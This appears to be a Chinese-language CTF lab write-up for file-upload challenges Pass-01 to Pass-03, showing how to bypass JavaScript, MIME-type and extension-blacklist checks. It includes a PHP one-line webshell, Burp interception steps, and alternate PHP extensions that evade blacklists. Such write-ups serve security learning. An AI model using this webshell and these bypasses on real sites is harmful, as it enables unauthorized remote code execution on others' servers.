文章目录
Pass-01-js检查
- 查看题目源码,发现三种后缀的文件可以上传。
- 上传一个后缀为.
jpg
的文件,文件内容为一句话木马<?php @eval($_POST[123]);?>
使用burp
抓包并修改文件后缀为php
,即可上传成功 - 上传成功使用一句话木马连接即可。
- 或者直接修改源码删去
JS
检查的代码,即可将php
木马文件直接上传。
Pass-02-MIME验证(content-type验证)
- 查看题目源码
- 查看题目提示为
MIME
验证,分析源码,可以通过burp
抓包修改数据包的第二个content-type
,并查看响应。
3. 拖拽点击上传成功的图片木马,看到php
配置页面即可说明上传成功。
4. 使用上述同样方法上传一句话木马,使用蚁剑连接即可。
Pass-03-黑名单绕过
-
查看题目源码用黑名单不允许上传.asp,.aspx,.php,.jsp后缀的文件
-
尝试直接上传一个文件后缀为
jpg
的一句话木马文件,拖拽点击图片,发现提示错误显示。 -
基于文件后缀验证名验证方式的分类:
①基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。
②基于黑名单验证:只针对黑名单中没有的后缀名,文件才能上传成功。
用黑名单不允许上传.asp,.aspx,.php,.jsp
后缀的文件,但可以上传.phtml、 .php3 .php5、php4、 .pht、php1、php2、phps
【这些后缀会被当成php文件解析】等等。
由于环境是phpstudy
搭建,其中限制了后缀,需要在目录D:\PhpStudy2018\PHPTutorial\Apache\conf
下将#AddType application/x-httpd-php.php.phtml
改为AddType application/x-httpd-php.php.phtml.php3.php4.php5
(记得去掉“#”) -
上传文件后缀为
php3
的内容为<?php phpinfo();?>
的文件,出现php
配置页面即可说明上传成功。 -
使用上述同样方法上传一句话木马,使用蚁剑连接即可。